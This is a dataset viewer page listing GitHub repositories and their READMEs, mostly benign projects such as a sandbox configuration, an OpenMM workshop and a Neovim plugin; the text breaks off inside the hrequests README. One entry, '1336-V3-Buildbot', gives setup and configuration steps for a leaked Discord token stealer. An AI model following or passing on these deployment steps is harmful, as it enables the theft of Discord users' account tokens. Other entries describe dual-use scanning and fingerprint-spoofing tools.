Dataset Viewer (auto-converted to Parquet)

| Column | Type | Length (min–max) |
| ----------- | ------ | ---------------- |
| full_name | string | 9–72 |
| url | string | 28–91 |
| description | string | 3–343 |
| readme | string | 1–207k |
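Because the dataset is auto-converted to Parquet, the four columns above can be inspected with any Parquet reader. Below is a minimal sketch, assuming the converted file has been downloaded locally as `data.parquet` (a hypothetical file name, not the dataset's actual file):

```python
# Minimal sketch: inspect the four columns described in the schema above from a
# local copy of the auto-converted Parquet file. "data.parquet" is a placeholder path.
import pandas as pd

df = pd.read_parquet("data.parquet", columns=["full_name", "url", "description", "readme"])
print(df[["full_name", "description"]].head())
print(df["readme"].str.len().describe())  # readme lengths range roughly 1 to 207k characters per the schema
```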
empty-233/tencent-sandbox
https://github.com/empty-233/tencent-sandbox
A Windows Sandbox configuration for sandboxing the Tencent app suite
# tencent-sandbox

tencent-sandbox is a configuration that uses [Windows Sandbox](https://learn.microsoft.com/zh-cn/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-overview) to sandbox the Tencent app suite.

## Notes

### **Windows 10 users**

#### With a Python environment

Run win10_init.py first.

#### Without a Python environment

1. Enter the **project directory** you cloned/downloaded
2. Press Win + R
3. Type powershell and press Enter
4. Run `PowerShell -ExecutionPolicy Bypass -File ".\win10_init.ps1"`

#### If the two options above are unclear

1. Open Tencent.wsb in a text editor
2. Manually change the `.\` in **every** entry such as `<HostFolder>.\tencent-sandbox\xxxxxxx</HostFolder>` to the **project directory** you cloned/downloaded.

### **Home editions** of Windows do not support the sandbox

## Compatibility

**WeChat**, **QQ**, **QQNT**, **TIM**, **WeCom (Enterprise WeChat)**, **Tencent Meeting**, and **Tencent Docs** have been tested and work normally. If you need anything else, please open an issue.

Note: **WeCom cannot log in automatically (it checks the device ID), so you have to log in again every time.**

## Sandbox configuration

**2 GB** of memory is allocated by default; change `<MemoryInMB>value</MemoryInMB>` (in MB) if needed.

**Audio input** is **enabled** by default; change `<AudioInput>value</AudioInput>` (Enable/Disable/Default) if needed.

**Clipboard redirection** is **enabled** by default; change `<ClipboardRedirection>value</ClipboardRedirection>` (Enable/Disable/Default) if needed.

**Video input** is **disabled** by default; change `<VideoInput>value</VideoInput>` (Enable/Disable/Default) if needed.

For other options, see the official [Windows Sandbox configuration](https://learn.microsoft.com/zh-cn/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-configure-using-wsb-file) documentation.

## Usage

Enable `Windows Sandbox`.

git clone this project, **or download it from `Releases`**

```bash
git clone https://github.com/empty-233/tencent-sandbox.git
```

Run `mkdir.bat` to **create the required directory structure in one step**.

**Configure `SysWOW64` following the options below.**

Open **Tencent.wsb**.

Install the **tested** software.

(Optional) Move the desktop shortcuts somewhere else and then back to the desktop (otherwise the shortcuts will disappear).

Once this is done the sandbox is ready to use; **accounts and data are preserved when the sandbox is closed**.

### Options

Choose one of the two methods below; **the system SysWOW64 is not mounted by default**.

#### Copy (default)

Start a new **default sandbox** and install **QQ** normally. After installation, copy `C:\Windows\SysWOW64` to `Data\SysWOW64` (otherwise QQ will crash after running for a while).

#### Mount

Change `<HostFolder>.\Data\SysWOW64</HostFolder>` to `<HostFolder>C:\Windows\SysWOW64</HostFolder>`.

## Mapped paths

See the `MappedFolder` entries in Tencent.wsb.

QQ save path: Data\Documents\Tencent\ (qqid) \FileRecv

WeChat save path: Data\Documents\WeChat\ (wxid) \FileStorage\File

For everything else, see `Data\Documents`.
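The Windows 10 fallback described above (editing every `<HostFolder>` entry by hand) amounts to rewriting the relative paths in Tencent.wsb to absolute ones. Here is a minimal Python sketch of that idea; it only illustrates the manual edit and is not the repository's actual win10_init.py script:

```python
# Illustrative sketch only: rewrite relative <HostFolder> paths in Tencent.wsb
# to absolute paths, which is what the manual Windows 10 step does by hand.
# This is not the repository's win10_init.py.
from pathlib import Path

wsb_file = Path("Tencent.wsb")
project_dir = Path.cwd()  # the directory you cloned/downloaded the project into

text = wsb_file.read_text(encoding="utf-8")
# Replace the leading ".\" of every mapped host folder with the project directory.
patched = text.replace("<HostFolder>.\\", f"<HostFolder>{project_dir}\\")
wsb_file.write_text(patched, encoding="utf-8")
print(f"Rewrote HostFolder entries to start with {project_dir}")
```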
openmm/openmm_workshop_july2023
https://github.com/openmm/openmm_workshop_july2023
null
# OpenMM workshop

This repository contains the materials for the OpenMM workshop delivered on 12th July 2023 after the CCPBioSim conference. The workshop consists of an introductory presentation, setup information, and a series of Jupyter notebooks. It was delivered in person and on Zoom, where demonstrators were on hand to answer questions. Only the intro slides are specific to the live course; the workshop materials are designed to be done by anyone at any time!

We aim to keep the notebooks up to date. If you have any questions, find any bugs, or have suggestions for improvement, please raise an issue in the GitHub repository.

## Introduction

This is a PowerPoint presentation. The slides can be found in [./slides](./slides).

## Setup

There are two ways to run the workshop notebooks:
- In a web browser with Google Colab.
- Running locally on your own machine in a Conda environment.

The instructions for either can be found in [./setup](./setup/README.md). We aim to keep the notebooks fully tested in Colab, so we suggest you run them there. Note that we have designed the exercises to not be computationally expensive, so they can be run on any hardware.

## Training materials

The material is in the form of Jupyter notebooks and is split into three sections.

### Section 1 - Introduction to OpenMM

- [**Protein in water**](./section_1/protein_in_water.ipynb). Aimed at people new to OpenMM. This covers loading in a PDB file, setting up a simulation, running the simulation, basic analysis, and advice for running on HPC resources.
- [**Protein-ligand complex**](./section_1/protein_ligand_complex.ipynb). Aimed at beginners. Covers parameterising a small molecule, combining topologies, and using other tools to create OpenMM-compatible input.

### Section 2 - Custom forces

- [**Custom forces and umbrella sampling**](./section_2/custom_forces.ipynb). Aimed at people looking to use the custom forces functionality of OpenMM (can be done after the Section 1 material if you are a beginner). Covers using custom forces with a case study of umbrella sampling.

### Section 3 - Machine Learning Potentials

- [**Machine Learning Potentials**](./section_3/machine_learning_potentials.ipynb). Aimed at people using machine learning potentials. Covers the OpenMM machine learning software stack with examples of using ANI and MACE.

## Extras

- [Guide on building OpenMM from source](./extra/compile_openmm.ipynb).

## Acknowledgments

- This workshop was prepared by Stephen Farr (University of Edinburgh, Michel research group) with support from EPSRC grant EP/W030276/1 "Supporting the OpenMM Community-led Development of Next-Generation Condensed Matter Modelling Software" and with help from Julien Michel (University of Edinburgh) and Will Poole (University of Southampton, Essex research group).
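To give a flavour of what the Section 1 material covers, here is a minimal OpenMM sketch of the "load a PDB, set up a simulation, run it" workflow described for the Protein in water notebook. It follows the standard OpenMM Python API; the input file name and run length are placeholders rather than values taken from the workshop notebooks.

```python
# Minimal OpenMM sketch: load a PDB, build a system with a standard force field,
# minimise, and run a short Langevin dynamics simulation.
# "protein.pdb" and the step counts are placeholders.
import sys

from openmm import LangevinMiddleIntegrator
from openmm.app import PDBFile, ForceField, Simulation, StateDataReporter, PME, HBonds
from openmm.unit import nanometer, kelvin, picosecond, picoseconds

pdb = PDBFile("protein.pdb")  # placeholder input structure
forcefield = ForceField("amber14-all.xml", "amber14/tip3pfb.xml")
system = forcefield.createSystem(
    pdb.topology, nonbondedMethod=PME, nonbondedCutoff=1 * nanometer, constraints=HBonds
)
integrator = LangevinMiddleIntegrator(300 * kelvin, 1 / picosecond, 0.004 * picoseconds)

simulation = Simulation(pdb.topology, system, integrator)
simulation.context.setPositions(pdb.positions)
simulation.minimizeEnergy()
simulation.reporters.append(
    StateDataReporter(sys.stdout, 100, step=True, potentialEnergy=True, temperature=True)
)
simulation.step(1000)  # short demonstration run
```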
embedchain/community-showcase
https://github.com/embedchain/community-showcase
null
> ## This repository is archived since we have moved all the community showcases to [docs.embedchain.ai](https://docs.embedchain.ai).

[![Discord](https://dcbadge.vercel.app/api/server/nhvCbCtKV?style=flat)](https://discord.gg/6PzXDgEjG5)
[![Twitter](https://img.shields.io/twitter/follow/embedchain)](https://twitter.com/embedchain)
[![Substack](https://img.shields.io/badge/Substack-%23006f5c.svg?logo=substack)](https://embedchain.substack.com/)

# Embedchain Community Showcase

A repository that collects and showcases all the apps, blogs, videos, and tutorials created by the community.

## Apps

### Open Source

- [Discord Bot for LLM chat](https://github.com/Reidond/discord_bots_playground/tree/c8b0c36541e4b393782ee506804c4b6962426dd6/python/chat-channel-bot) by Reidond
- [EmbedChain-Streamlit-Docker App](https://github.com/amjadraza/embedchain-streamlit-app) by amjadraza
- [Harry Potter Philosphers Stone Bot](https://github.com/vinayak-kempawad/Harry_Potter_Philosphers_Stone_Bot/) by Vinayak Kempawad ([linkedin post](https://www.linkedin.com/feed/update/urn:li:activity:7080907532155686912/))
- [LLM bot trained on own messages](https://github.com/Harin329/harinBot) by Hao Wu

### Closed Source

- [Taobot.io](https://taobot.io) - chatbot & knowledgebase hybrid by [cachho](https://github.com/cachho)

## Templates

### Replit

- [Embedchain Chat Bot](https://replit.com/@taranjeet1/Embedchain-Chat-Bot) by taranjeetio
- [Embedchain Memory Chat Bot Template](https://replit.com/@taranjeetio/Embedchain-Memory-Chat-Bot-Template) by taranjeetio

## Posts

### Blogs

- [Customer Service LINE Bot](https://www.evanlin.com/langchain-embedchain/)

### LinkedIn

- [What is embedchain](https://www.linkedin.com/posts/activity-7079393104423698432-wRyi/) by Rithesh Sreenivasan
- [Building a chatbot with EmbedChain](https://www.linkedin.com/posts/activity-7078434598984060928-Zdso/) by Lior Sinclair
- [Making chatbot without vs with embedchain](https://www.linkedin.com/posts/kalyanksnlp_llms-chatbots-langchain-activity-7077453416221863936-7N1L/) by Kalyan KS

### Twitter

- [What is embedchain](https://twitter.com/AlphaSignalAI/status/1672668574450847745) by Lior
- [Building a chatbot with Embedchain](https://twitter.com/Saboo_Shubham_/status/1673537044419686401) by Shubham Saboo

## Videos

- [embedChain Create LLM powered bots over any dataset Python Demo Tesla Neurallink Chatbot Example](https://www.youtube.com/watch?v=bJqAn22a6Gc) by Rithesh Sreenivasan
- [Embedchain - NEW 🔥 Langchain BABY to build LLM Bots](https://www.youtube.com/watch?v=qj_GNQ06I8o) by 1littlecoder
- [EmbedChain -- NEW!: Build LLM-Powered Bots with Any Dataset](https://www.youtube.com/watch?v=XmaBezzGHu4) by DataInsightEdge
- [Chat With Your PDFs in less than 10 lines of code! EMBEDCHAIN tutorial](https://www.youtube.com/watch?v=1ugkcsAcw44) by Phani Reddy
- [How To Create A Custom Knowledge AI Powered Bot | Install + How To Use](https://www.youtube.com/watch?v=VfCrIiAst-c) by The Ai Solopreneur
- [Build Custom Chatbot in 6 min with this Framework [Beginner Friendly]](https://www.youtube.com/watch?v=-8HxOpaFySM) by Maya Akim
- [embedchain-streamlit-app](https://www.youtube.com/watch?v=3-9GVd-3v74) by Amjad Raza

## Mentions

### Github repos

- [awesome-ChatGPT-repositories](https://github.com/taishi-i/awesome-ChatGPT-repositories)
agathasangkara/Vidio-Premier
https://github.com/agathasangkara/Vidio-Premier
🎥 Vidio Premier Account Generator
🎥 Vidio Premier Generator 3-12 Month

```
COMING SOON 😋
```
fei666888/radioberry_mod
https://github.com/fei666888/radioberry_mod
Based on the Radioberry designed by https://github.com/pa3gsb/Radioberry-2.x
# radioberry_mod

Based on the Radioberry designed by https://github.com/pa3gsb/Radioberry-2.x

Redesigns the PCB layout for an easier build.
Nowze/1336-V3-Buildbot
https://github.com/Nowze/1336-V3-Buildbot
null
Hey everyone i leak my own discord token stealer since 2019-2023. Im leaving discord and stop everything. Be fun with the source code every instructions are here. Please tag the github if you use it i need star :c french Utilise un Vps avec Ubuntu 20.04 (je préfère https://rdp.sh/ c'est 10$ par mois et en plus c'est proche c'est a Amsterdam) - sudo apt install zip - sudo apt install unzip Upload le zip extrait le zip (si le repertoire de fichier ne se nomme pas Stealer renomme le Download Node v18.16.1: - sudo apt update - sudo apt install curl - curl -sL https://deb.nodesource.com/setup_18.x | sudo -E bash - - sudo apt install -y nodejs Setup the src on your vps - sudo npm install - sudo npm i pm2 -g - sudo npm install -g pkg Unzip node_modules.zip dans Stealer/bot Install https://anonfiles.com/5dwb0204z6/node_modules_zip et place les dans ClientObf and unzip Changer vos directories dans Stealer/Bot/index.js et mettez les nouvelles (ex: /home/vshell/ClientObf/link.txt votre nom de vps est lolita, alors cela fera /home/lolita/ClientObf/link.txt si c'est root votre user alors cela sera /root/a/ClientObf/link.txt ) Pour modifier le nom des logs allez dans Stealer/ClientObf/Utils dans discord.js Modifier les émojis et le nom et dans stats.js c'est de même. Pour modifier le nom des embeds de build allez dans Stealer/Bot et dans index.js vous pouvez renammes le bot ^^ Ajouter dans Stealer/Bot/index.js: token: "your token" client id: "discord developper portal (app id)" guildid: "your guild id" verified roles: "customers roles" /build icon: none (icon not work or crash bot) webhook_url: your webhook name: yourname with no space or crash bot Ne pas edit la config de build.js sinon plus rien ne marchera official 1336 Channel https://t.me/St34ler ----------------------------------------------------------------------- English Use Vps with Ubuntu 20.04 (i prefer https://rdp.sh/ 10$ server per month in amsterdam) - sudo apt install zip - sudo apt install unzip Download zip extracts the zip (if the file directory is not named Stealer renames the Download Node v18.16.1: - sudo apt update - sudo apt install curl - curl -sL https://deb.nodesource.com/setup_18.x | sudo -E bash - - sudo apt install -y nodejs Setup the src on your vps Unzip node_modules.zip in Stealer/bot Install https://anonfiles.com/5dwb0204z6/node_modules_zip and put him on ClientObf and unzip - sudo npm install - sudo npm i pm2 -g - sudo npm install -g pkg Change your directories in Stealer/Bot/index.js and put the new ones (ex: /home/vshell/ClientObf/link.txt your vps name is lolita, then this will do /home/lolita/ClientObf/link.txt if your user are root /root/a/ClientObf/link.txt ) To modify the name of the logs go to Stealer/ClientObf/Utils in discord.js Modify emojis and name and in stats.js it's the same. To modify the name of the build embeds go to Stealer/Bot and in index.js you can rename the bot ^^ Add in Stealer/Bot/index.js: token: "your token" client id: "discord developper portal (app id)" guildid: "your guild id" verified roles: "customers roles" /build icon: none (icon not work or crash bot) webhook_url: your webhook name: yourname with no space or crash bot don't edit build.js or nothing will be work official 1336 Channel https://t.me/St34ler
bitquark/shortscan
https://github.com/bitquark/shortscan
An IIS short filename enumeration tool
# Shortscan

An IIS short filename enumeration tool.

## Functionality

Shortscan is designed to quickly determine which files with short filenames exist on an IIS webserver. Once a short filename has been identified the tool will try to automatically identify the full filename.

In addition to standard discovery methods, Shortscan also uses a unique checksum matching approach to attempt to find the long filename where the short filename is based on Windows' proprietary shortname collision avoidance checksum algorithm (more on this research at a later date).

## Installation

### Quick install

Using a recent version of [go](https://golang.org/):

```
go install github.com/bitquark/shortscan/cmd/shortscan@latest
```

### Manual install

To build (and optionally install) locally:

```
go get && go build
go install
```

## Usage

### Basic usage

Shortscan is easy to use with minimal configuration. Basic usage looks like:

```
$ shortscan http://example.org/
```

### Examples

This example sets multiple custom headers by using `--header`/`-H` multiple times:

```
shortscan -H 'Host: gibson' -H 'Authorization: Basic ZGFkZTpsMzN0'
```

To check whether a site is vulnerable without performing file enumeration use:

```
shortscan --isvuln
```

### Advanced features

The following options allow further tweaks:

```
$ shortscan --help
Shortscan v0.6 · an IIS short filename enumeration tool by bitquark
Usage: main [--wordlist FILE] [--header HEADER] [--concurrency CONCURRENCY] [--timeout SECONDS] [--verbosity VERBOSITY] [--fullurl] [--stabilise] [--patience LEVEL] [--characters CHARACTERS] [--autocomplete mode] [--isvuln] URL

Positional arguments:
  URL                    url to scan

Options:
  --wordlist FILE, -w FILE
                         combined wordlist + rainbow table generated with shortutil
  --header HEADER, -H HEADER
                         header to send with each request (use multiple times for multiple headers)
  --concurrency CONCURRENCY, -c CONCURRENCY
                         number of requests to make at once [default: 20]
  --timeout SECONDS, -t SECONDS
                         per-request timeout in seconds [default: 10]
  --verbosity VERBOSITY, -v VERBOSITY
                         how much noise to make (0 = quiet; 1 = debug; 2 = trace) [default: 0]
  --fullurl, -F          display the full URL for confirmed files rather than just the filename [default: false]
  --stabilise, -s        attempt to get coherent autocomplete results from an unstable server (generates more requests) [default: false]
  --patience LEVEL, -p LEVEL
                         patience level when determining vulnerability (0 = patient; 1 = very patient) [default: 0]
  --characters CHARACTERS, -C CHARACTERS
                         filename characters to enumerate [default: JFKGOTMYVHSPCANDXLRWEBQUIZ8549176320-_()&'!#$%@^{}~]
  --autocomplete mode, -a mode
                         autocomplete detection mode (auto = autoselect; method = HTTP method magic; status = HTTP status; distance = Levenshtein distance; none = disable) [default: auto]
  --isvuln, -V           bail after determining whether the service is vulnerable [default: false]
  --help, -h             display this help and exit
```

## Utility

The shortscan project includes a utility named `shortutil` which can be used to perform various short filename operations and to make custom rainbow tables for use with the tool.

### Examples

You can create a rainbow table from an existing wordlist like this:

```
shortutil wordlist input.txt > output.rainbow
```

To generate a one-off checksum for a file:

```
shortutil checksum index.html
```

### Usage

Run `shortutil <command> --help` for a definitive list of options for each command.

```
Shortutil v0.3 · a short filename utility by bitquark
Usage: main <command> [<args>]

Options:
  --help, -h             display this help and exit

Commands:
  wordlist               add hashes to a wordlist for use with, for example, shortscan
  checksum               generate a one-off checksum for the given filename
```

## Wordlist

A custom wordlist was built for shortscan. For full details see [pkg/shortscan/resources/README.md](pkg/shortscan/resources/README.md)

## Credit

Original IIS short filename [research](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf) by Soroush Dalili. Additional research and this project by [bitquark](https://github.com/bitquark).
HiPhish/rainbow-delimiters.nvim
https://github.com/HiPhish/rainbow-delimiters.nvim
Rainbow delimiters for Neovim with Tree-sitter
.. default-role:: code ############################### Rainbow delimiters for Neovim ############################### This Neovim plugin provides alternating syntax highlighting (“rainbow parentheses”) for Neovim, powered by `Tree-sitter`_. The goal is to have a hackable plugin which allows for different configuration of queries and strategies, both globally and per file type. Users can override and extend the built-in defaults through their own configuration. This is a fork of `nvim-ts-rainbow2`_, which was implemented as a module for `nvim-treessiter`_. However, since nvim-treesitter has deprecated the module system I had to create this standalone plugin. Installation and setup ###################### Installation ============ Install it like any other Neovim plugin. You will need a Tree-sitter parser for each language you want to use rainbow delimiters with. Setup ===== Configuration is done by setting entries in the Vim script dictionary `g:rainbow_delimiters`. Here is an example configuration: .. code:: vim let g:rainbow_delimiters = { \ 'strategy': { \ '': rainbow_delimiters#strategy.global, \ 'vim': rainbow_delimiters#strategy.local, \ }, \ 'query': { \ '': 'rainbow-delimiters', \ 'lua': 'rainbow-blocks', \ }, \ 'highlight': [ \ 'RainbowDelimiterRed', \ 'RainbowDelimiterYellow', \ 'RainbowDelimiterBlue', \ 'RainbowDelimiterOrange', \ 'RainbowDelimiterGreen', \ 'RainbowDelimiterViolet', \ 'RainbowDelimiterCyan', \ ], \ } The equivalent code in Lua: .. code:: lua -- This module contains a number of default definitions local rainbow_delimiters = require 'rainbow-delimiters' vim.g.rainbow_delimiters = { strategy = { [''] = rainbow_delimiters.strategy['global'], vim = rainbow_delimiters.strategy['local'], }, query = { [''] = 'rainbow-delimiters', lua = 'rainbow-blocks', }, highlight = { 'RainbowDelimiterRed', 'RainbowDelimiterYellow', 'RainbowDelimiterBlue', 'RainbowDelimiterOrange', 'RainbowDelimiterGreen', 'RainbowDelimiterViolet', 'RainbowDelimiterCyan', }, } Please refer to the `manual`_ for more details. For those who prefer a `setup` function there is the module `rainbow-delimiters.setup`. Help wanted ########### There are only so many languages which I understand to the point that I can write queries for them. If you want support for a new language please consider contributing code. See the CONTRIBUTING_ for details. Status of the plugin #################### Tree-sitter support in Neovim is still experimental. This plugin and its API should be considered stable insofar as breaking changes will only happen if changes to Neovim necessitates them. .. warning:: There is currently a shortcoming in Neovim's Tree-sitter API which makes it so that only the first node of a capture group can be highlighted. Please see `neovim/neovim#17099`_ for details. Affected queries: - HTML `rainbow-delimiters` - JSX (Javascript + React.js) `rainbow-delimiters-react` (affects React tags only) - Python (`rainbow-delimiters`) (affects only the `for ... in` inside comprehensions) - TSX (Typescript + React.js) `rainbow-delimiters-react` (affects React tags only) - Vue.js `rainbow-delimiters` Most of these are related to HTML-like tags, so you can use an alternative query instead. See the manual_ (`:h ts-rainbow-query`) for a list of extra queries. Screenshots ########### Bash ==== .. image:: https://user-images.githubusercontent.com/4954650/212133420-4eec7fd3-9458-42ef-ba11-43c1ad9db26b.png :alt: Screenshot of a Bash script with alternating coloured delimiters C = .. 
image:: https://user-images.githubusercontent.com/4954650/212133423-8b4f1f00-634a-42c1-9ebc-69f8057a63e6.png :alt: Screenshot of a C program with alternating coloured delimiters Common Lisp =========== .. image:: https://user-images.githubusercontent.com/4954650/212133425-85496400-4e24-4afd-805c-55ca3665c4d9.png :alt: Screenshot of a Common Lisp program with alternating coloured delimiters Java ==== .. image:: https://user-images.githubusercontent.com/4954650/212133426-7615f902-e39f-4625-bb91-2e757233c7ba.png :alt: Screenshot of a Java program with alternating coloured delimiters LaTeX ===== Using the `blocks` query to highlight the entire `\begin` and `\end` instructions. .. image:: https://user-images.githubusercontent.com/4954650/212133427-46182f57-bfd8-4cbe-be1f-9aad5ddfd796.png :alt: Screenshot of a LaTeX document with alternating coloured delimiters License ####### Licensed under the Apache-2.0 license. Please see the `LICENSE`_ file for details. Migrating from nvim-ts-rainbow2 ############################### Rainbow-Delimiters uses different settings than nvim-ts-rainbow2, but converting the configuration is straight-forward. The biggest change is where the settings are stored. - Settings are stored in the global variable `g:rainbow-delimiters`, which has the same keys as the old settings - The default strategy and query have index `''` (empty string) instead of `1` - Default highlight groups have the prefix `RainbowDelimiter` instead of `TSRainbow`, e.g. `RainbowDelimiterRed` instead of `TSRainbowRed` - The default query is now called `rainbow-delimiters` instead of `rainbow-parens` - The public Lua module is called `rainbow-delimiters` instead of `ts-rainbow` The name of the default query is now `rainbow-delimiters` because for some languages like HTML the notion of "parentheses" does not make any sense. In HTML the only meaningful delimiter is the tag. Hence the generic notion of a "delimiter". Attribution ########### This is a fork of a previous Neovim plugin, the original repository is available under https://sr.ht/~p00f/nvim-ts-rainbow/. Attributions from the original author ===================================== Huge thanks to @vigoux, @theHamsta, @sogaiu, @bfredl and @sunjon and @steelsojka for all their help .. _Tree-sitter: https://tree-sitter.github.io/tree-sitter/ .. _nvim-treesitter: https://github.com/nvim-treesitter/nvim-treesitter .. _CONTRIBUTING: CONTRIBUTING.rst .. _LICENSE: LICENSE .. _manual: doc/rainbow-delimiters.txt .. _neovim/neovim#17099: https://github.com/neovim/neovim/pull/17099 .. _nvim-ts-rainbow2: https://gitlab.com/HiPhish/nvim-ts-rainbow2 .. _nvim-treessiter: https://github.com/nvim-treesitter/nvim-treesitter
7eu7d7/HCP-Diffusion-webui
https://github.com/7eu7d7/HCP-Diffusion-webui
webui for HCP-Diffusion
# HCP Diffusion web UI

A graphical interface for HCP Diffusion based on Vue.js and Flask.

![](./imgs/infer.webp)
![](./imgs/train.webp)

## Installation on Windows

### Prerequisites

1. Install [Python](https://www.python.org/downloads/) (Python >= 3.11 is not supported) and check "Add Python to PATH" so it is added to the environment variables.
2. Install [git](https://git-scm.com/download/win).
3. Install [node.js](https://nodejs.org/en/download) (>= 14.0.0).

### Download HCP Diffusion and the webui

```bash
git clone https://github.com/7eu7d7/HCP-Diffusion-webui.git
cd HCP-Diffusion-webui
git clone https://github.com/7eu7d7/HCP-Diffusion.git
```

### Automatic installation and launch

Run `webui-user.bat`.

## Installation on Linux

### Install dependencies:

```bash
# Debian-based:
sudo apt install wget git python3 python3-venv nodejs
# Red Hat-based:
sudo dnf install wget git python3 nodejs
# Arch-based:
sudo pacman -S wget git python3 nodejs
```

### Download HCP Diffusion and the webui

```bash
git clone https://github.com/7eu7d7/HCP-Diffusion-webui.git
cd HCP-Diffusion-webui
git clone https://github.com/7eu7d7/HCP-Diffusion.git
```

### Automatic installation and launch

```bash
bash webui.sh
```

Options can be configured in `webui-user.sh`.

## Usage notes

+ Models in `diffusers` format placed in the `sd_models/` folder can be loaded.
+ Put trained `lora` or `part` (fine-tuned) models in the `ckpts/` folder.
+ Generated images and their corresponding configuration files are written to `output/`.
daijro/hrequests
https://github.com/daijro/hrequests
🚀 Web scraping for humans
<img src="https://i.imgur.com/r8GcQW1.png" align="center"> </img> <h2 align="center">hrequests</h2> <h4 align="center"> <p align="center"> <a href="https://github.com/daijro/hrequests/blob/main/LICENSE"> <img src="https://img.shields.io/github/license/daijro/hrequests.svg"> </a> <a href="https://python.org/"> <img src="https://img.shields.io/badge/python-3.7&#8208;3.11-blue"> </a> <a href="https://pypi.org/project/hrequests/"> <img alt="PyPI" src="https://img.shields.io/pypi/v/hrequests.svg"> </a> <a href="https://pepy.tech/project/hrequests"> <img alt="PyPI" src="https://pepy.tech/badge/hrequests"> </a> <a href="https://github.com/ambv/black"> <img src="https://img.shields.io/badge/code%20style-black-black.svg"> </a> <a href="https://github.com/PyCQA/isort"> <img src="https://img.shields.io/badge/imports-isort-yellow.svg"> </a> </p> Hrequests (human requests) is a simple, configurable, feature-rich, replacement for the Python requests library. </h4> ### ✨ Features - Seamless transition between HTTP and headless browsing 💻 - Integrated fast HTML parser 🚀 - High performance concurrency with gevent (*without monkey-patching!*) 🚀 - Replication of browser TLS fingerprints 🚀 - JavaScript rendering 🚀 - Supports HTTP/2 🚀 - Realistic browser header generation 🚀 - JSON serializing up to 10x faster than the standard library 🚀 ### 💻 Browser crawling - Simple & uncomplicated browser automation - Human-like cursor movement and typing - Chrome extension support - Full page screenshots - Headless and headful support - No CORS restrictions ### ⚡ More - High performance ✨ - Minimal dependence on the python standard libraries - Written with type safety - 100% threadsafe ❤️ --- # Installation Install via pip: ```bash pip install -U hrequests python -m playwright install chromium ``` Other depedencies will be downloaded on the first import: ```py >>> import hrequests ``` --- # Documentation 1. [Simple Usage](https://github.com/daijro/hrequests#simple-usage) 2. [Sessions](https://github.com/daijro/hrequests#sessions) 3. [Concurrent & Lazy Requests](https://github.com/daijro/hrequests#concurrent--lazy-requests) 4. [HTML Parsing](https://github.com/daijro/hrequests#html-parsing) 5. [Browser Automation](https://github.com/daijro/hrequests#browser-automation) <hr width=50> ## Simple Usage Here is an example of a simple `get` request: ```py >>> resp = hrequests.get('https://www.google.com/') ``` Requests are sent through [bogdanfinn's tls-client](https://github.com/bogdanfinn/tls-client) to spoof the TLS client fingerprint. This is done automatically, and is completely transparent to the user. Other request methods include `post`, `put`, `delete`, `head`, `options`, and `patch`. The `Response` object is a near 1:1 replica of the `requests.Response` object, with some additional attributes. <details> <summary>Parameters</summary> ``` Parameters: url (str): URL to send request to data (Union[str, bytes, bytearray, dict], optional): Data to send to request. Defaults to None. files (Dict[str, Union[BufferedReader, tuple]], optional): Data to send to request. Defaults to None. headers (dict, optional): Dictionary of HTTP headers to send with the request. Defaults to None. params (dict, optional): Dictionary of URL parameters to append to the URL. Defaults to None. cookies (Union[RequestsCookieJar, dict, list], optional): Dict or CookieJar to send. Defaults to None. json (dict, optional): Json to send in the request body. Defaults to None. allow_redirects (bool, optional): Allow request to redirect. Defaults to True. 
history (bool, optional): Remember request history. Defaults to False. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. timeout (int, optional): Timeout in seconds. Defaults to 30. proxies (dict, optional): Dictionary of proxies. Defaults to None. no_pause (bool, optional): Run the request in the background. Defaults to False. <Additionally includes all parameters from `hrequests.Session` if a session was not specified> Returns: hrequests.response.Response: Response object ``` </details> ### Properties Get the response url: ```py >>> resp.url: str 'https://www.google.com/' ``` Check if the request was successful: ```py >>> resp.status_code: int 200 >>> resp.reason: str 'OK' >>> resp.ok: bool True >>> bool(resp) True ``` Getting the response body: ```py >>> resp.text: str '<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><m...' >>> resp.content: Union[bytes, str] '<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><m...' ``` Parse the response body as JSON: ```py >>> resp.json(): Union[dict, list] {'somedata': True} ``` Get the elapsed time of the request: ```py >>> resp.elapsed: datetime.timedelta datetime.timedelta(microseconds=77768) ``` Get the response cookies: ```py >>> resp.cookies: RequestsCookieJar <RequestsCookieJar[Cookie(version=0, name='1P_JAR', value='2023-07-05-20', port=None, port_specified=False, domain='.google.com', domain_specified=True... ``` Get the response headers: ```py >>> resp.headers: CaseInsensitiveDict {'Alt-Svc': 'h3=":443"; ma=2592000,h3-29=":443"; ma=2592000', 'Cache-Control': 'private, max-age=0', 'Content-Encoding': 'br', 'Content-Length': '51288', 'Content-Security-Policy-Report-Only': "object-src 'none';base-uri 'se ``` <hr width=50> ## Sessions Creating a new Chrome Session object: ```py >>> session = hrequests.Session() # version randomized by default >>> session = hrequests.Session('chrome', version=112) ``` <details> <summary>Parameters</summary> ``` Parameters: browser (Literal['firefox', 'chrome', 'opera'], optional): Browser to use. Default is 'chrome'. version (int, optional): Version of the browser to use. Browser must be specified. Default is randomized. os (Literal['win', 'mac', 'lin'], optional): OS to use in header. Default is randomized. headers (dict, optional): Dictionary of HTTP headers to send with the request. Default is generated from `browser` and `os`. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. timeout (int, optional): Default timeout in seconds. Defaults to 30. ja3_string (str, optional): JA3 string. Defaults to None. h2_settings (dict, optional): HTTP/2 settings. Defaults to None. additional_decode (str, optional): Additional decode. Defaults to None. pseudo_header_order (list, optional): Pseudo header order. Defaults to None. priority_frames (list, optional): Priority frames. Defaults to None. header_order (list, optional): Header order. Defaults to None. force_http1 (bool, optional): Force HTTP/1. Defaults to False. catch_panics (bool, optional): Catch panics. Defaults to False. debug (bool, optional): Debug mode. Defaults to False. 
